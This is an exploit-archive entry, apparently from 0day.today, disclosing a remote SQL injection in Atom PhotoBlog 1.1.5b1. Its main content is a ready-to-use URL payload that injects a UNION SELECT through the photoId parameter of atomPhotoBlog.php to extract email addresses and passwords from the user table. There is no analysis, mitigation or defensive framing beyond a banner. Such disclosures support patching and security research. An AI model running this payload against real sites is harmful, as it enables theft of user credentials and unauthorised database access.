id: 3442
date: 07/23/2008
title: Atom PhotoBlog 1.1.5b1 (photoId) Remote SQL Injection Vulnerability
author: Mr.SQL
cves: 

===================================================================
Atom PhotoBlog 1.1.5b1 (photoId) Remote SQL Injection Vulnerability
===================================================================



###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL injection Vulnerability
##
## Atom PhotoBlog ( atomPhotoBlog.php do )
##                            
## http://sourceforge.net/projects/atomphotoblog/                           
##                            
###############################################################
########################
########################
##
## -[[: Exploite :]]-
##
## www.Target.com/atomPhotoBlog.php?do=show&photoId=969696+union+select+0,0,0,0,0,0,0,0,0,0,0,mail,pass,0+from+user
##
########################
########################



#  0day.today [2023-03-24]  #